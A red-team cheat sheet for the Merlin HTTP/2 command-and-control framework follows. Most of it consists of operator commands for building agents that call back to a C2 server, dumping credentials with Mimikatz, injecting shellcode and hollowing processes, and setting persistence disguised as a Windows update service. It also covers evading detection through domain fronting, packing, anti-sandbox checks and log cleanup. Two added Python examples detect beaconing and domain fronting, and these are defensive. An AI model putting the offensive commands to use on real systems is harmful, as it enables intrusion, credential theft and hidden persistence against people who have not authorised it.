Merlin C2 Framework Cheat Sheet

Overview

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang. It leverages HTTP/2 for communication, providing modern protocol evasion capabilities with built-in data jitter and encryption.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Pre-compiled Binaries

bash
# Download latest release for Linux
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z

# Download latest release for Windows
# Download merlinServer-Windows-x64.7z from GitHub releases

# Download latest release for macOS
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z
7z x merlinServer-Darwin-x64.7z

Build from Source

bash
# Install Go (version 1.19+)
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin
make build-server
make build-agent

Docker Installation

bash
# Pull official Docker image
docker pull ne0nd0g/merlin

# Run Merlin server in Docker
docker run -it -p 443:443 ne0nd0g/merlin

Basic Usage

Starting Merlin Server

bash
# Start server with default settings
./merlinServer-Linux-x64

# Start server with custom interface
./merlinServer-Linux-x64 -i 0.0.0.0

# Start server with custom port
./merlinServer-Linux-x64 -p 8443

# Start server with custom certificate
./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key

Agent Generation

bash
# Generate Windows agent
make build-agent-windows

# Generate Linux agent
make build-agent-linux

# Generate macOS agent
make build-agent-darwin

Command Reference

Server Management

Command      Description
help         Display help menu
version      Show version information
listeners    List active listeners
agents       List connected agents
sessions     Show active sessions
exit         Exit Merlin server

Listener Management

Command                 Description
listeners               List all listeners
use listener <type>     Select listener type
set <option> <value>    Set listener option
start                   Start the listener
stop                    Stop the listener
info                    Show listener information

Agent Interaction

Command                      Description
interact <agent-id>          Interact with agent
shell <command>              Execute shell command
upload <local> <remote>      Upload file to agent
download <remote> <local>    Download file from agent
kill                         Kill the agent
back                         Return to main menu

Listener Configuration

HTTP/2 Listener

bash
# Use HTTP/2 listener
use listener http2

# Configure listener options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start

HTTP/3 Listener (QUIC)

bash
# Use HTTP/3 listener
use listener http3

# Configure QUIC options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start

TCP Listener

bash
# Use TCP listener
use listener tcp

# Configure TCP options
set Interface 0.0.0.0
set Port 4444

# Start listener
start

SMB Listener

bash
# Use SMB listener (Windows)
use listener smb

# Configure SMB options
set Interface 0.0.0.0
set Port 445

# Start listener
start

Agent Configuration

HTTP/2 Agent

bash
# Build HTTP/2 agent
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

# Build with custom options
GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go

Agent Options

bash
# Set communication URL
-X main.url=https://server.com:443

# Set sleep interval
-X main.sleep=30s

# Set jitter percentage
-X main.jitter=0.2

# Set maximum retries
-X main.maxretry=7

# Set user agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Set proxy
-X main.proxy=http://proxy.com:8080
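
Seen from the detection side, a fixed sleep with bounded jitter leaves a timing signature in flow or proxy logs. The following is an added example, not part of the original cheat sheet or the Merlin project; it assumes jitter is a fraction of the sleep interval, and the function name, thresholds and sample events are constructed for illustration.

```python
from collections import defaultdict
from itertools import accumulate
from statistics import median

def beacon_candidates(events, min_events=6, min_interval=5.0, max_dispersion=0.25):
    """Return {(src, dst): (median_gap, dispersion)} for regular check-in pairs.

    events: iterable of (epoch_seconds, src, dst) from flow or proxy logs.
    dispersion = MAD(gaps) / median(gaps). Uniform +/-j jitter around a fixed
    sleep gives roughly j/2, so 0.25 tolerates jitter up to about 0.5.
    Median and MAD keep one long gap (host suspended) from hiding the pattern.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in events:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_events:
            continue                      # too few connections to judge
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mid = median(gaps)
        if mid < min_interval:
            continue                      # interactive or bulk traffic, not a sleep loop
        mad = median(abs(g - mid) for g in gaps)
        dispersion = mad / mid
        if dispersion <= max_dispersion:
            hits[pair] = (mid, round(dispersion, 3))
    return hits

def _events(start, gaps, src, dst):
    """Build constructed sample events from a start time and a list of gaps."""
    return [(t, src, dst) for t in accumulate(gaps, initial=start)]

# Constructed sample data (not real traffic): one host checking in about every
# 30 s with 20% jitter and a single 300 s pause, and one host browsing in bursts.
SAMPLE = (
    _events(1_700_000_000, [30, 26, 35, 29, 33, 24, 31, 36, 300],
            "10.0.0.5", "203.0.113.10:443")
    + _events(1_700_000_000, [1, 2, 1, 240, 3, 1, 600, 2, 1],
              "10.0.0.7", "198.51.100.20:443")
)

if __name__ == "__main__":
    for pair, (gap, disp) in beacon_candidates(SAMPLE).items():
        print(pair, gap, disp)
```

Tune `min_interval` and `max_dispersion` against a baseline of known software updaters and telemetry clients, which also poll on a schedule.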

Post-Exploitation Commands

System Information

bash
# Get system information
sysinfo

# Get current user
whoami

# Get environment variables
env

# Get network interfaces
ifconfig

# Get running processes
ps

File Operations

bash
# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /path/to/new/directory

# Remove file
rm /path/to/file

# Copy file
cp /source/file /destination/file

# Move file
mv /source/file /destination/file

Network Operations

bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# DNS lookup
nslookup domain.com

# Ping host
ping 192.168.1.1

Process Management

bash
# List processes
ps

# Kill process
kill <pid>

# Start process
execute <command>

# Get process information
info <pid>

Advanced Features

Module System

bash
# List available modules
modules

# Use module
use module <module-name>

# Set module options
set <option> <value>

# Run module
run

# Show module info
info

Built-in Modules

bash
# Mimikatz module
use module mimikatz
set Command sekurlsa::logonpasswords
run

# PowerShell module
use module powershell
set Command Get-Process
run

# Assembly execution
use module executeassembly
set Assembly /path/to/assembly.exe
set Arguments "arg1 arg2"
run

Shellcode Execution

bash
# Execute shellcode
use module shellcode
set Shellcode <base64-encoded-shellcode>
run

# Shellcode injection
use module shinject
set PID <target-pid>
set Shellcode <base64-encoded-shellcode>
run

Persistence

bash
# Registry persistence
use module persistence
set Method registry
set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
set Value "Update"
set Data "C:\temp\agent.exe"
run

# Service persistence
use module service
set Name "UpdateService"
set DisplayName "Windows Update Service"
set BinaryPath "C:\temp\agent.exe"
run

Evasion Techniques

Traffic Obfuscation

bash
# Custom User-Agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom headers
-X main.headers="X-Custom-Header:value"

# Domain fronting
-X main.url=https://cdn.example.com
-X main.host=legitimate-site.com
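
For defenders, the url/host split above is visible wherever TLS is inspected: the SNI names one site and the inner Host header names another. The following is an added example, not part of the original cheat sheet or the Merlin project; it assumes a TLS-inspecting proxy that writes JSON lines, and the field names `src`, `sni` and `host`, the allow-list and the sample records are hypothetical.

```python
import json

def _site(host):
    """Approximate the registrable domain as the last two labels.

    Assumption for this example only; use the Public Suffix List in production.
    """
    name = host.lower().split(":")[0].rstrip(".")
    return ".".join(name.split(".")[-2:])

def fronting_suspects(log_lines, allow=frozenset()):
    """Return (src, sni, host) for requests whose TLS SNI and HTTP Host differ.

    log_lines: JSON lines with the hypothetical fields 'src', 'sni', 'host'.
    allow: (sni_site, host_site) pairs that are known-good, such as a CDN
    that legitimately serves several of the organisation's own domains.
    """
    suspects = []
    for line in log_lines:
        try:
            rec = json.loads(line)
            src, sni, host = rec["src"], rec["sni"], rec["host"]
        except (ValueError, KeyError, TypeError):
            continue                      # malformed or incomplete record
        if not sni or not host:
            continue                      # nothing to compare
        pair = (_site(sni), _site(host))
        if pair[0] != pair[1] and pair not in allow:
            suspects.append((src, sni, host))
    return suspects

# Constructed sample log (not real traffic); the first record mirrors the
# url/host pair shown above.
SAMPLE_LOG = [
    '{"src": "10.0.0.5", "sni": "cdn.example.com", "host": "legitimate-site.com"}',
    '{"src": "10.0.0.6", "sni": "www.example.org", "host": "www.example.org"}',
    '{"src": "10.0.0.7", "sni": "static.example.net", "host": "img.example.net:443"}',
    '{"src": "10.0.0.8", "sni": "cdn.example.com", "host": "assets.example.org"}',
    'not json',
]
ALLOW = {("example.com", "example.org")}

if __name__ == "__main__":
    for hit in fronting_suspects(SAMPLE_LOG, ALLOW):
        print(hit)
```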

Payload Obfuscation

bash
# Build with custom build tags
go build -tags="debug" -ldflags "-s -w" -o agent.exe

# Use UPX packing
upx --best agent.exe

# Custom encryption
-X main.psk=your-pre-shared-key

Anti-Analysis

bash
# VM detection
use module vmdetect
run

# Sandbox evasion
use module sleep
set Duration 60
run

# Process hollowing
use module hollow
set Target notepad.exe
set Payload <base64-encoded-payload>
run

Certificate Management

Generate Self-Signed Certificate

bash
# Generate certificate and key
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

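# Generate with SAN (process substitution requires bash)
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -config <(
echo '[req]'
# Point at a separate DN section and apply the SAN section as X.509 extensions
echo 'distinguished_name = dn'
echo 'x509_extensions = SAN'
echo 'prompt = no'
echo '[dn]'
echo 'CN = server.com'
echo '[SAN]'
echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100'
)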

Let's Encrypt Certificate

bash
# Install certbot
sudo apt install certbot

# Generate certificate
certbot certonly --standalone -d yourdomain.com

# Use certificate with Merlin
./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem

Operational Procedures

Infrastructure Setup

bash
# Use redirectors
# Set up nginx reverse proxy
server {
    listen 443 ssl http2;
    server_name legitimate-site.com;
    
    ssl_certificate /path/to/cert.crt;
    ssl_certificate_key /path/to/key.key;
    
    location / {
        proxy_pass https://merlin-server:443;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Team Operations

bash
# Multi-operator setup
# Use shared database or file system
# Implement proper access controls
# Use separate operator certificates

Logging and Monitoring

bash
# Enable detailed logging
./merlinServer-Linux-x64 -debug

# Monitor connections
tail -f merlin.log

# Network monitoring
tcpdump -i any -w merlin_traffic.pcap port 443

Troubleshooting

Connection Issues

bash
# Check listener status
listeners

# Test connectivity
curl -k https://server.com:443

# Check certificate
openssl s_client -connect server.com:443 -servername server.com

Agent Issues

bash
# Debug agent connection
# Build agent with debug flags
go build -ldflags "-X main.debug=true" -o agent-debug.exe

# Check agent logs
# Enable verbose output in agent

Performance Issues

bash
# Adjust sleep and jitter
-X main.sleep=10s
-X main.jitter=0.1

# Optimize HTTP/2 settings
# Increase connection limits
# Use connection pooling

Certificate Problems

bash
# Verify certificate
openssl x509 -in server.crt -text -noout

# Check certificate chain
openssl verify -CAfile ca.crt server.crt

# Test SSL configuration
sslscan server.com:443

Detection Evasion

Network Level

  • Use legitimate certificates and domains
  • Implement proper HTTP/2 configuration
  • Vary communication patterns and timing
  • Use domain fronting techniques
  • Implement proper error handling

Host Level

  • Use legitimate process names and paths
  • Implement anti-VM and sandbox detection
  • Use process hollowing and injection
  • Encrypt payloads and communications
  • Clean up artifacts and logs

Behavioral

  • Limit resource usage and network activity
  • Use legitimate user agents and headers
  • Implement proper sleep and jitter
  • Avoid suspicious API calls
  • Use living-off-the-land techniques


This cheat sheet provides a comprehensive reference for using Merlin C2 Framework. Always ensure you have proper authorization before using this tool in any environment.